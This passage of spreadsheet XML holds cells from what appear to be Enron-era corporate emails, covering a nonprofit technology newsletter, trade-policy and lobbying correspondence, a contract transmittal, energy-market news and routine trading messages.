=20_x000D_
has also been included.  You may direct any additional questions concerning=_x000D_
=20_x000D_
the event to Mary Solmonson at (713)-853-6079._x000D_
_x000D_
I hope that you will be able to participate.  Please confirm your attendanc=_x000D_
e=20_x000D_
for the two days with Marvia Jefferson at 713-853-9165 by January 29th 5:00=_x000D_
=20_x000D_
p.m.  If you are unable to attend, it may be appropriate to select someone=_x000D_
=20_x000D_
else to participate.  Please do not extend an invitation to anyone else to=_x000D_
=20_x000D_
take your place until you and I have discussed this._x000D_
_x000D_
I thank you in advance for your participation and look forward to seeing yo=_x000D_
u=20_x000D_
in Dallas!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 12 Oct 2001 11:18:04 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'will.reed@techforall.org'})</t>
  </si>
  <si>
    <t>Technology For All ....October update</t>
  </si>
  <si>
    <t>Technology For All invites you to read the articles to go with the headlines_x000D_
below..._x000D_
_x000D_
TECHNOLOGY FOR ALL-HOUSTON REACHES MILESTONE_x000D_
DEPARTMENT OF COMMERCE GRANT TO SUPPORT TFA/AAMA PROJECT_x000D_
ALLISON AND TERRORIST ATTACKS IMPACT FUNDING_x000D_
_x000D_
----------------------------------------------_x000D_
TECHNOLOGY FOR ALL-HOUSTON REACHES MILESTONE_x000D_
100 Community Based Organizations Served since 1998_x000D_
An estimated 20,000 persons now served each week_x000D_
_x000D_
Houston, Texas  - (October 5, 2001) - Since the first installation of a_x000D_
computer lab at the M.D. Anderson YMCA in May 1998, Technology For_x000D_
All-Houston (TFA-Houston) has helped develop and create 100 community_x000D_
technology centers (CTCs) serving Houston's underserved communities.  The_x000D_
100th CTC installation is in collaboration with The Living Temple Ministries_x000D_
Inc. (TLT, Inc.), a community-based organization developing a new CTC that_x000D_
will serve Houston's northeast side.  TLT, Inc. will utilize the lab to_x000D_
expand a workforce development initiative called the Alpha Career Center._x000D_
_x000D_
TLT, Inc. is a non-profit, multi-racial, faith-based organization_x000D_
incorporated in Houston in 1997.  Since inception TLT, Inc. has developed_x000D_
programs designed to serve low to middle income Houstonians.  Initially_x000D_
operating in Southwest Houston, the development of the new CTC will enable_x000D_
TLT, Inc. to expand services to the Northeast side.  In addition to_x000D_
providing technology access and after school activities, the CTC will serve_x000D_
as an extension of TLT, Inc.'s successful Alpha Career Center workforce_x000D_
development and training program.  The Alpha Career Center offers free IT_x000D_
classes to underserved individuals, and through a relationship with CC_x000D_
Staffing, is able to provide job placements upon student completion of the_x000D_
program._x000D_
_x000D_
TFA-Houston is pleased to support TLT, Inc. and the Alpha Career Center_x000D_
because of the innovative programming and volunteer support, as well as_x000D_
their proven track record of accomplishments in the community.   The_x000D_
provision of computer hardware and access to TFA's suite of online software_x000D_
will allow TLT, Inc. the opportunity to further its mission of  "ministering_x000D_
to the total man."  Technology For All-Houston is proud to be a partner in_x000D_
this effort._x000D_
_x000D_
Since its organization in late 1997 TFA-Houston has focused its efforts in_x000D_
Houston on the development of collaborative relationships with_x000D_
community-based organizations serving Houston's low-income underserved_x000D_
population. With each organization TFA-Houston has helped develop a_x000D_
technology and program plan that will serve the needs of the community._x000D_
Using new computers and computers redeployed from corporate donations,_x000D_
TFA-Houston has worked with the organization to build a community technology_x000D_
center.  Additionally, TFA-Houston brings other supportive and collaborative_x000D_
relationships to each new CTC it helps develop.  These include the expertise_x000D_
and online content resources provided by its parent organization Technology_x000D_
For All (TFA) and others._x000D_
_x000D_
TFA-Houston is the local affiliate of TFA.  Together they have also_x000D_
developed key supportive relationships with the Houston Technology Center,_x000D_
The Telecom Opportunity Institute, Rice University, the Houston Children's_x000D_
Museum and the Houston Area Technology Advisory Council of the Greater_x000D_
Houston Partnership.   Each of these collaborative relationships help_x000D_
provided added value to the support that TFA and TFA-Houston bring to local_x000D_
grass roots organizations bringing technology to Houston's underserved_x000D_
communities._x000D_
_x000D_
Community-based organizations assisted through the collaborative efforts of_x000D_
TFA and TFA-Houston include local YMCAs, community centers, churches, faith_x000D_
based social service agencies, community development organizations and_x000D_
others focused on providing services to Houston's low-income underserved_x000D_
communities. In addition to the M. D. Anderson YMCA, organizations assisted_x000D_
include the Liberation Project, a CDC in Missouri City, the Pleasant Grove_x000D_
Baptist Church, the Tejano Center, the Park Place United Methodist Church,_x000D_
Talente Bilingua, and the Southeast Family Community Center. While_x000D_
TFA-Houston CTCs are located throughout the Houston area, the majority are_x000D_
located in Houston's Enhanced Enterprise Community that includes the Third_x000D_
Ward, Fourth Ward, Fifth Ward, Sixth Ward and Houston's East End._x000D_
_x000D_
"Technology For All-Houston is supported in its mission to bring technology_x000D_
to underserved communities by many Houston corporations, who redeploy_x000D_
computers back into the community through TFA," says Will Reed, President_x000D_
and CEO of TFA/TFA-Houston.  The generous support TFA's donor base of_x000D_
individuals, foundations, and corporations comes from many, including_x000D_
Houston Endowment, the Linda and Ken Lay family, the M.D. Anderson_x000D_
Foundation, the Vivian Smith Foundation.  Corporate sponsors include Enron,_x000D_
SmartForce, FYI-Net, ExxonMobil, Shell, BP and many others.  New corporate_x000D_
partners are always welcome for the support they provide in the community in_x000D_
collaboration with TFA and TFA-Houston through contributions of computer_x000D_
hardware being replaced as well as cash contributions.   For more_x000D_
information about support for Technology For All and its community partners,_x000D_
contact Will Reed at 713.316.5761 or 713.316.0012._x000D_
-------------------------------------------------_x000D_
_x000D_
_x000D_
$850,000 DEPARTMENT OF COMMERCE GRANT_x000D_
Supports Project of Two Houston Non-Profits_x000D_
_x000D_
Houston, Texas  - (October 1, 2001) -Technology For All (TFA) announces a_x000D_
relationship with the Association for the Advancement of Mexican Americans_x000D_
(AAMA) toward the accomplishment TFA's national initiative to bring_x000D_
technology to underserved communities.  Through an $850,000 grant from the_x000D_
Technology Opportunities Program (TOP) of the U. S. Department of Commerce,_x000D_
the Latino Technology Network (LTN) will connect twelve diverse_x000D_
Community-Based Organizations across the nation.  Community Technology_x000D_
Centers (CTC) will be established within eleven of the organizations for_x000D_
educational and technology training.   Community Technology Centers are a_x000D_
places in many underserved communities where students can utilize computers_x000D_
and take advantage of online content provided by TFA.   AAMA will help_x000D_
develop the LTN, and TFA will provide CTC participants with access to the_x000D_
complete suite of SmartForce e-Learning courses, which includes everything_x000D_
from basic technology skills to several certification tracks.  SmartForce_x000D_
courses are offered in English and Spanish.  CTCs will work with at-risk,_x000D_
inner-city Hispanic high school students to train them in advanced web-based_x000D_
applications and maintenance of the national network.  Students taking_x000D_
SmartForce courses will gain skills necessary for competing successfully for_x000D_
higher-wage technology employment upon their graduation from high school._x000D_
_x000D_
The United States Hispanic population is increasing dramatically-from 35.5_x000D_
million or 12.5% of the total population recorded in the 2000 census to a_x000D_
projected 98 million in 2050.  The LTN project will provide CTCs with a_x000D_
network for collaboration and sharing as well as affordable access top_x000D_
high-speed internet connectivity and technical support that the CTCs_x000D_
otherwise would not be able to support.  The project makes a concerted_x000D_
effort to reach out to at-risk youth._x000D_
_x000D_
TFA provides affiliated CTCs with access to the TFA "eSource Room"*, a_x000D_
private, password protected web space that provides access to application_x000D_
software and educational content.  Through the "eSource Room"*, students_x000D_
will be able to access online content focused on their individual learning_x000D_
needs._x000D_
_x000D_
"This new relationship with AAMA will encourage collaborative relationships_x000D_
between several Latino organizations and community technology centers in_x000D_
underserved communities", said Technology For All President and CEO Will_x000D_
Reed. "We are pleased that students and families with limited means will now_x000D_
have some of the same educational opportunities that others take for_x000D_
granted."_x000D_
_x000D_
AAMA is considered one of the most successful Hispanic non-profits in the_x000D_
United States, celebrating thirty years of service to Texans.  At its_x000D_
Sanchez Charter High School AAMA has pioneered the Advanced Technology_x000D_
Computing Center, a working model for training "at-risk" youth and placing_x000D_
them in jobs with Fortune 1000 corporations._x000D_
_x000D_
TFA and AAMA provide the Latino Technology Network with needed expertise,_x000D_
skills and infrastructure.  Other project partners include the National_x000D_
Puerto Rican Coalition, the National Association for Bilingual Education,_x000D_
the National Puerto Rican Forum, the Cuban American National Council,_x000D_
Student Alternatives Program, Inc., the Center for Training and Careers,_x000D_
Chicanos por la Causa, Metropolitan Area Advisory Committee, Multicultural_x000D_
Area Health Education Center, and the National Association of Latino Elected_x000D_
and Appointed Officials._x000D_
_x000D_
----------------------------------------_x000D_
_x000D_
ALLISON AND TERRORIST ATTACKS IMPACT FUNDING_x000D_
_x000D_
Technology For All and Technology For All-Houston have both been impacted by_x000D_
the important support that foundations and corporations have given to flood_x000D_
relief and terrorist victim support._x000D_
_x000D_
To do its part, both organizations have reduced monthly operating expenses_x000D_
through staff attrition, voluntary salary reductions by senior staff and_x000D_
other means.  Both organizations are also working to increase both cash and_x000D_
in-kind donations in an effort to weather the storm of funding reductions_x000D_
brought on by the difficult events of recent months._x000D_
_x000D_
If you do not wish to receive these monthly updates. Please send a reply to_x000D_
Will.Reed@techforall.org_x000D_
_x000D_
Have a good weekend._x000D_
_x000D_
Will_x000D_
_x000D_
-------------------------------------------------_x000D_
William S. Reed_x000D_
President/CEO_x000D_
Technology For All &amp; Technology For All-Houston_x000D_
109 North Post Oak Lane, Suite 425_x000D_
Houston, Texas  77024_x000D_
713.316.5761_x000D_
&lt;http://www.techforall.org&gt;_x000D_
_x000D_
TFA Operations Center &amp;_x000D_
Technology For All-Houston_x000D_
3405 Marquart, Suite 300_x000D_
Houston, Texas  77027_x000D_
713.961.9945_x000D_
_x000D_
will.reed@techforall.org</t>
  </si>
  <si>
    <t>Thu, 17 Jan 2002 07:12:09 -0800 (PST)</t>
  </si>
  <si>
    <t>Daily Energy Letter</t>
  </si>
  <si>
    <t xml:space="preserve">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_x000D_
Daily Energy Letter_x000D_
http://www.carrfut.com/research/Energy1/Energy-Letter1-17-02.pdf_x000D_
</t>
  </si>
  <si>
    <t>Sat, 17 Jun 2000 04:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kim.melodick@enron.com', 'hector.mcloughlin@enron.com', 'norma.villarreal@enron.com'})</t>
  </si>
  <si>
    <t>Investigation</t>
  </si>
  <si>
    <t>Privileged and Confidential_x000D_
_x000D_
In our meeting on Friday, we talked about the summary of complaints that you _x000D_
three are going to do.  If possible, I would like to receive those by Tuesday _x000D_
night so that they can be reviewed on Wednesday.  We are meeting with _x000D_
Beck/Olson on Thursday._x000D_
_x000D_
Let me know if that is impossible -- I know you all are swamped with zillions _x000D_
of other things!_x000D_
_x000D_
Thanks._x000D_
_x000D_
Michelle</t>
  </si>
  <si>
    <t>Mon, 6 Nov 2000 12:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Reactions Website</t>
  </si>
  <si>
    <t>http://www.reactionsnet.com_x000D_
_x000D_
Thank you for registering for a free trial to the Reactions magazine website._x000D_
_x000D_
Your user name and password are listed below - please keep this email or a _x000D_
printout of these details as you will need them to access the site._x000D_
_x000D_
If you have any problems logging on or using this site please feel free to _x000D_
contact our help desk on +44 (0) 20 7779 8006 or _x000D_
mailto:web-help@euromoneyplc.com_x000D_
_x000D_
Your trial user name is:  Kaminski_x000D_
_x000D_
and your password is:     105006_x000D_
_x000D_
Reactions is also available in hard copy format. If you wish to receive a _x000D_
complimentary copy, please email us your full mailing address._x000D_
_x000D_
For further informationon all sbscriptions, please call our hotline on +44 _x000D_
(0) 20 7779 8999 (UK) or 1-800 437 9997 (USA) or _x000D_
mailto:hotline@euromoneyplc.com.</t>
  </si>
  <si>
    <t>Fri, 11 Aug 2000 09:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gapickart@cmsenergy.com', 'bworthington@usea.org', 'dsed@chevron.com', 'talley@us.abb.com', 'don.deline@halliburton.com', 'townshme@bp.com', 'zoglmarr@westinghouse.com', 'wmir@chevron.com', 'skatz@kelleydrye.com', 'stephen.burns@enron.com', 'jpruzan@pecc.org', 'mmarvin@bcse.org', 'joe.hillings@enron.com', 'robert_w_haines@email.mobil.com', 'stephen.cooney@sc.siemens.com', 'joh_meakem@nema.org', 'platnerm@api.org', 'rodney.j.macalister@usa.conoco.com', 'ammod@aol.com', 'lora.sullivan@enron.com', 'chris.long@enron.com', 'jhayes@usasean.org', 'norman@cg-la.com', 'rcsteinmetz@ra.rockwell.com', 'bbauman@epri.com', 'jeaston@eei.org', 'nymex2@unidial.com', 'steven.kean@enron.com', 'ebajer@acec.org', 'rlhealy@polilink.com', 'jaime_steve@awea.org', 'mizrochj@ctc.com', 'tim.richards@corporate.ge.com', '75361.622@compuserve.com', 'm.irace@erols.com', 'pgombert@enerx.com', 'browning@sugar-land.sl.slb.com', 'jsheire@eabc.org', 'steve.may@alliedsignal.com', 'sstephens@pesa.org', 'telliott@epsa.org', 'barbara.jones1@halliburton.com', 'pschaub@entergy.com', 'david.peterson@nrgenergy.com', 'glenda.cone@mcdermott.com', 'nkl@dwgp.com', 'susan.rochford@honeywell.com', 'gfriedmann@ingaa.org', 'vastine@uscsi.org', 'lynn.mcalister-bunn@eds.com', 'rob.mcdonald@emrsn.com', 'cbcapstrat@aol.com', 'sae@ipaa.org', 'art.downey@bakerhughes.com', 'jgavin@uscib-dc.org', 'ezsol@aol.com', 'gdeeley@uschamber.com', 'laudienl@epenergy.com', 'dawn.fenton@us.abb.com', 'jweisgall@aol.com', 'ron.will@nrgenergy.com', 'dobrien@ou.edu'})</t>
  </si>
  <si>
    <t>Energy Services Materials</t>
  </si>
  <si>
    <t xml:space="preserve">To all ESC members:_x000D_
_x000D_
At our meeting this past Monday, Carol Balassa (USTR) told us that she would_x000D_
be sending to us for comment a matrix/concordance of the commercial_x000D_
activities and commercial descriptions that the ESC provided the USG this_x000D_
past spring (our illustrative lists) with the system used by the WTO to_x000D_
classify services (the Provisional Central Product Classification [CPC] and_x000D_
the GATS' own classification document W/120.  That matrix is attached below._x000D_
Also attached is a document that describes the meaning of the various CPC_x000D_
classifications, so that you may interpret more accurately the matrix_x000D_
prepared by the USG.  The materials largely were prepared by the ITC, which_x000D_
has done yeoman's work and deserves our thanks._x000D_
The purpose of these materials is to see where our activities fall within_x000D_
the WTO GATS classification system._x000D_
_x000D_
The immediate task for us is to try to answer various questions the USG_x000D_
interagency team has about the types of activities we have told them our_x000D_
sector does.  These questions are in boxes along the left-hand margin of the_x000D_
text.  They often ask us for clarifications about what we have said we do_x000D_
and to provide specific examples.  Beyond that, if there are elements on_x000D_
which you have questions/comments, we should give that feedback back to_x000D_
USTR._x000D_
_x000D_
The ESC Executive Committee would appreciate it if all members would look at_x000D_
the questions and send us any guidance they can on issues of relevance to_x000D_
their companies/associations.  We also would ask that the Chairs of the_x000D_
various Working Groups (hydrocarbons, electricity, technology, and_x000D_
renewables) particularly look at the document to see if they need to get_x000D_
their Working groups together to review the questions and our responses._x000D_
_x000D_
Carol noted that these same documents will be submitted to the ISACs for_x000D_
comment.  For those of you who are on the ISACs, it will help Carol and her_x000D_
team if we can note where there might be a duplication in the comments_x000D_
provided by the ESC and various ISAC members who also are ESC members._x000D_
_x000D_
Please direct all comments/questions to Bob Fisher at Hills &amp; Company.  His_x000D_
phone number is 202 822-4700.  His e-mail address is_x000D_
"rcfisher@hillsandco.com".  Carol has asked for our comments by September 1._x000D_
In order to meet her deadline, we need to have comments to Bob by August 30._x000D_
_x000D_
_x000D_
With thanks to all for your assistance - Joe Hillings_x000D_
_x000D_
 &lt;&lt;USG MATRIX WITH INDUSTRY QUESTIONS 8-11-00.doc&gt;&gt;   &lt;&lt;RELEVANT CPC_x000D_
DESCRIPTIONSaug09.doc&gt;&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - USG MATRIX WITH INDUSTRY QUESTIONS 8-11-00.doc_x000D_
 - RELEVANT CPC DESCRIPTIONSaug09.doc_x000D_
</t>
  </si>
  <si>
    <t>Fri, 20 Oct 2000 08:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Electrobolt EPC Contract</t>
  </si>
  <si>
    <t xml:space="preserve">fyi.  This form came from Global Finance. _x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 10/20/2000 03:00 _x000D_
PM ---------------------------_x000D_
From: Roseann Engeldorf on 10/20/2000 11:12 AM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Electrobolt EPC Contract_x000D_
_x000D_
Per my voicemail._x000D_
_x000D_
Rose_x000D_
----- Forwarded by Roseann Engeldorf/Corp/Enron on 10/20/2000 11:11 AM -----_x000D_
_x000D_
	"David Gohlke" &lt;DGOHLKE@skadden.com&gt;_x000D_
	10/19/2000 05:08 PM_x000D_
		 _x000D_
		 To: glauco.palhoto@enron.com, jeff.westfahl@enron.com, _x000D_
john.g.rigby@enron.com, john.guidry@enron.com, john.novak@enron.com, _x000D_
john.r.ayres@enron.com, jose.anson@enron.com, kevin.joyce@enron.com, _x000D_
laine.a.powell@enron.com, lisa.alfaro@enron.com, luiz.watanabe@enron.com, _x000D_
mary.cilia@enron.com, mary.kimball@enron.com, Mike.Morrison@enron.com, _x000D_
patricia.scholz@enron.com, Peter.N.Anderson@enron.com, _x000D_
roderick.blackham@enron.com, roseann.engeldorf@enron.com, _x000D_
roshena.ham@enron.com, scott.dieball@enron.com, sergio.nomura@enron.com, _x000D_
stephen.gray@enron.com_x000D_
		 cc: "Brian Bradshaw" &lt;BBRADSHA@skadden.com&gt;, "Thomas Weil" _x000D_
&lt;TWEIL@skadden.com&gt;_x000D_
		 Subject: Electrobolt EPC Contract_x000D_
_x000D_
_x000D_
ESA, EECC and Finance Teams,_x000D_
_x000D_
Attached for your review is the Electrobolt EPC Contract (our doc # _x000D_
39444.04), which incorporates the negotiated provisions of the Electrobolt _x000D_
MOU.  To assist you in your review, I have also attached (1) a blackline of _x000D_
the Electrobolt EPC marked to show all changes from the RioGen EPC Contract _x000D_
distributed October 17, and (2) a blackline of the Electrobolt EPC marked to _x000D_
show all revisions to the EECC form EPC contract._x000D_
_x000D_
Please note that the comparison document, prepared by DeltaView, shows new _x000D_
text in blue double underscore, deleted text in red strikethrough, and moved _x000D_
text in green (double underscore at the new location, strikethrough from _x000D_
where moved)._x000D_
_x000D_
Please call if you have questions/comments._x000D_
_x000D_
Regards,_x000D_
Dave Gohlke_x000D_
_x000D_
David E. Gohlke_x000D_
Skadden, Arps, Slate, Meagher &amp; Flom LLP_x000D_
1600 Smith Street, Suite 4460_x000D_
Houston, Texas 77002_x000D_
direct (713) 655-5158_x000D_
fax - main (713) 655-5181_x000D_
dgohlke@skadden.com_x000D_
_x000D_
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at _x000D_
(212) 735-3000 and permanently delete the original and any copy of any e-mail _x000D_
and any printout thereof._x000D_
_x000D_
Further information about the firm, a list of the Partners and their _x000D_
professional qualifications will be provided upon request._x000D_
_x000D_
 - 39444_4.doc_x000D_
 - 39822_1.doc_x000D_
 - 39820_1.doc_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Feb 2001 10:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Credit Report--2/1/01</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Darron C Giron/HOU/ECT on 02/05/2001 _x000D_
06:43 PM ---------------------------_x000D_
   _x000D_
_x000D_
_x000D_
From:  Veronica Espinoza @ ENRON                                              _x000D_
               02/01/2001 04:12 P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Tanya _x000D_
Rohauer/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT, William S Bradford/HOU/ECT@ECT, _x000D_
Russell Diamond/HOU/ECT@ECT, Lesli Campbell/HOU/ECT@ECT, Nidia _x000D_
Mendoza/HOU/ECT@ECT, Jeffrey C Gossett/HOU/ECT@ECT, Kam Keiser/HOU/ECT@ECT, _x000D_
David Baumbach/HOU/ECT@ECT, Errol McLaughlin/Corp/Enron@ENRON, Darron C _x000D_
Giron/HOU/ECT@ECT, Walter Guidroz/NA/Enron@Enron, Leslie Reeves/HOU/ECT@ECT, _x000D_
Veronica Gonzalez/HOU/ECT@ECT, Phillip M Love/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Credit Report--2/1/01_x000D_
_x000D_
_x000D_
_x000D_
I apologize for the delay on the distribution, as we had systems issues._x000D_
_x000D_
_x000D_
Please contact Walter Guidroz at x5-3595 if you have any questions on the _x000D_
Aquila COLW deal._x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 02:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/25/01; HourAhead hour: 10;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t>Start Date: 4/25/01; HourAhead hour: 10;  No ancillary schedules awarded.  No _x000D_
variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001042510.txt</t>
  </si>
  <si>
    <t>Tue, 20 Jun 2000 11:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Imagine, if you can, a world in which information is disseminated as rapidly _x000D_
as it is received.  A world in which news reaches you before you even have a _x000D_
chance to wonder about it, much less speculate with your colleagues at the _x000D_
water cooler.  _x000D_
_x000D_
A world in which the barriers to timely communication of important facts are _x000D_
erased like last month's unfiled emails._x000D_
_x000D_
Sounds too good to be true in "Corporate America", doesn't it?  Well, hold on _x000D_
to your hats; there's a new online publication in town.  _x000D_
_x000D_
The dot is coming.</t>
  </si>
  <si>
    <t>Thu, 15 Mar 2001 02:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Market Repair Team Memo</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Katie:_x000D_
Thought IEP folks might be interested._x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
Wednesday March 14, 12:22 pm Eastern Time_x000D_
_x000D_
US Senate rejects California utility bankruptcy measure_x000D_
By Patrick Connole_x000D_
_x000D_
WASHINGTON, March 14 (Reuters) - The U.S. Senate on Wednesday rejected a bid _x000D_
to force California utility companies to repay power generators for _x000D_
electricity they bought under a federal government sales order, even if _x000D_
utilities go bankrupt._x000D_
_x000D_
In a motion on the Senate floor, lawmakers killed an amendment to a broader _x000D_
bankruptcy reform bill that opponents said was a dangerous proposal that _x000D_
would have opened the door to involuntary bankruptcy filings by troubled _x000D_
California utilities. The utilities in question are PG&amp;E Corp.'s (NYSE:PCG - _x000D_
news) Pacific Gas &amp; Electric and Edison International's (NYSE:EIX - news) _x000D_
Southern California Edison._x000D_
_x000D_
The amendment was sponsored by Oregon Democrat Sen. Ron Wyden, Montana _x000D_
Democrat Sen. Max Baucus and Oregon Republican Sen. Gordon Smith._x000D_
_x000D_
Proponents said the measure would have protected the customers of the _x000D_
federally-owned Bonneville Power Administration and other Northwest utilities _x000D_
from unfair rate increases due to the California energy crisis._x000D_
_x000D_
``I don't think it's fair for consumers in other Western states to get caught _x000D_
holding the bag if California utilities take our power and then run into _x000D_
bankruptcy court to avoid their debts,'' Wyden said._x000D_
_x000D_
``The Northwest has been more than a good neighbor to California during this _x000D_
crisis,'' he said._x000D_
_x000D_
Interestingly, the California Senate delegation was split on the matter. _x000D_
Democrat Dianne Feinstein opposed the amendment, while fellow Democrat _x000D_
Barbara Boxer supported it._x000D_
_x000D_
Feinstein called the proposal a ``dangerous amendment'' that would create two _x000D_
classes of creditors and ``probably force an involuntary bankruptcy.''_x000D_
_x000D_
The broader bankruptcy reform bill is expected to be approved by the Senate _x000D_
by the end of the week._x000D_
_x000D_
Separately, talks between California and its three investor owned utilities _x000D_
on a deal under which the state might buy their transmission assets continued _x000D_
this week with no deal in sight._x000D_
_x000D_
The state is negotiating with PG&amp;E and Edison, along with Sempra Energy _x000D_
(NYSE:SRE - news) unit San Diego Gas and Electric._x000D_
_x000D_
The deals are aimed mainly at pumping money into PG&amp;E and SoCal Edison to _x000D_
keep them out of bankruptcy after they recorded about $13 billion in red ink _x000D_
since last spring, paying sky-high prices for power in the wholesale market._x000D_
_x000D_
PG&amp;E and SoCal Edison, under the terms of the state's disastrous experiment _x000D_
with market deregulation, have been able to pass on to their retail customers _x000D_
only a fraction of their power purchase costs. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 Aug 2000 17:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>A.Word.A.Day--pedantic</t>
  </si>
  <si>
    <t>pedantic (pe-DAN-tik) adjective_x000D_
_x000D_
   Characterized by a narrow, often ostentatious concern for book learning_x000D_
   and formal rules._x000D_
_x000D_
[French pedant, or Italian pedante (French, from Italian), possibly from_x000D_
Vulgar Latin *paedens, -paedent-, present participle of -paedere, to_x000D_
instruct, probably from Greek paiduein, from pais, paid-, child + -ic.]_x000D_
_x000D_
   "Mr Updike uses different names for his characters... But the name_x000D_
   changes are jarring, and their flavour is pedantic, as if Mr Updike_x000D_
   simply wants credit for doing his homework."_x000D_
   Witty, wise, then weary, Economist, Feb 19, 2000._x000D_
_x000D_
This week's theme: words from the world of learning and the learned._x000D_
_x000D_
............................................................................._x000D_
Men seek out retreats for themselves in the country, by the seaside, on the_x000D_
moutains... But all this is unphilosophical to the last degree... when thou_x000D_
canst at a moment's notice retire into thyself. -Marcus Aelius Aurelius_x000D_
_x000D_
Have you checked out AWADtalk, the new bulletin board for all things word?_x000D_
It's your place to share opinions, ask questions, answer queries, or just_x000D_
sit around and see what others are saying. Join AWADtalk, the online_x000D_
community for linguaphiles from around the world: http://wordsmith.org/board_x000D_
_x000D_
Pronunciation:_x000D_
http://wordsmith.org/words/pedantic.wav_x000D_
http://wordsmith.org/words/pedantic.ram</t>
  </si>
  <si>
    <t>Tue, 8 Feb 2000 21:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: OECD Meetings June 26-28, Paris</t>
  </si>
  <si>
    <t xml:space="preserve">One of the things I'd like to talk about next week is setting up a process to _x000D_
funnel requests for Ken's time through ( Jeff andf Joe also), so that we're _x000D_
forwarding to him consensus  high priority requests. Thanks._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Joe Hillings@ENRON_x000D_
02/07/2000 07:48 AM_x000D_
To: Kenneth Lay/Corp/Enron@Enron_x000D_
cc: Rosalee Fleming/Corp/Enron@Enron, Richard Shapiro/HOU/EES@EES, Mark _x000D_
Schroeder/LON/ECT@ECT, Steven J Kean/HOU/EES@EES _x000D_
Subject: OECD Meetings June 26-28, Paris_x000D_
_x000D_
Ken: While in Europe last week I arranged a meeting with Douglas Worth, _x000D_
Secretary General of the Business Industry Advisory Committee (BIAC) to the _x000D_
OECD. Doug headed the Washington office of IBM until he retired a few years _x000D_
ago, then joined Carla Hills firm and two years ago became Secretary General _x000D_
of the BIAC. During his Washington service for IBM he headed up the Trade _x000D_
Committee of the United States Council for International Business to which we _x000D_
have long been a member. _x000D_
_x000D_
Doug and I discussed the promotion of energy services and he had several _x000D_
suggestions which I found to be excellent. He is a top level person who _x000D_
recommends policy to the OECD. He suggested that he would like to organize a _x000D_
meeting with you briefing OECD ministers and senior staff on business plans _x000D_
of today, changes in the market place and what is necessary to advance a _x000D_
business in today's atmosphere. Doug believes that having such a high level _x000D_
briefing advances the cause of business and competitive policies which is the _x000D_
priority of the OECD._x000D_
_x000D_
He also called my attention to the OECD Forum 2000 to be held June 26-28 in _x000D_
Paris. Doug has offered to contact Dennis Lamb, another former Washingtonian _x000D_
in the diplomatic service who is arranging the program and if you are _x000D_
available he would ask that you be a primetime speaker. It covers the type of _x000D_
issues that you addressed at the WTO in Seatlle and the World Economic Forum _x000D_
in Davos.  (I would dearly love to have a few minutes briefing from you on _x000D_
your Davos appearances)._x000D_
_x000D_
I think these presentations at the OECD, one a private luncheon with _x000D_
Ministers that Doug thinks would be an informal presentation and the _x000D_
possibility of a slot on the June 26-28 program would be excellent for our _x000D_
cause and hope that your schedule either in June or later can accommodate _x000D_
this opportunity._x000D_
_x000D_
Joe_x000D_
_x000D_
PS: Doug and his eco-staff director Ms. Hanne Rosenbaum (she knows and has _x000D_
worked with John Palmisano) told me that one of their main themes this year _x000D_
is eco-efficiency which seems to fit our Enron goals._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 02:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mike.swerzbin@enron.com', 'kate.symes@enron.com'})</t>
  </si>
  <si>
    <t>Deal #477087.01 Pinnacle West...</t>
  </si>
  <si>
    <t xml:space="preserve">Same with this one.  I need contact info to verbal._x000D_
Gracias Amiga!_x000D_
Kim_x000D_
---------------------- Forwarded by Kimberly Hundl/Corp/Enron on 12/11/2000 _x000D_
10:08 AM ---------------------------_x000D_
_x000D_
_x000D_
Kimberly Hundl_x000D_
12/11/2000 10:00 AM_x000D_
To: Kate Symes/PDX/ECT@ECT, John Malowney/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Deal #476578.03 Montana Power Company_x000D_
_x000D_
Hi Kate,_x000D_
I need to get a contact name and phone number for this counterparty so that I _x000D_
can get a verbal confirm on this deal.  Please see if John can give you this _x000D_
information.  Have a lovely day!_x000D_
Thanks!_x000D_
Kim_x000D_
</t>
  </si>
  <si>
    <t>Thu, 29 Mar 2001 04:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'athomas@newenergy.com'})</t>
  </si>
  <si>
    <t>Comparison exhibit for AB 21X</t>
  </si>
  <si>
    <t>Aaron, here is the comparison exhibit between the current version of AB 21X_x000D_
and the preferred direct access coalition draft bill. I believe it is_x000D_
correct, please check it and advise me of any edits that are required._x000D_
Given Lawrence's terrible rewrite of the bill, it sounds like we should_x000D_
organize a conferenceat least.  Let me know what you plan on doing.   This_x000D_
is a word document, I don't know why the icon looks this way.  Call me if_x000D_
you have trouble opening it.   Thanks, Mike_x000D_
_x000D_
_x000D_
 &lt;&lt;X23020.DOC&gt;&gt;_x000D_
_x000D_
 - X23020.DOC</t>
  </si>
  <si>
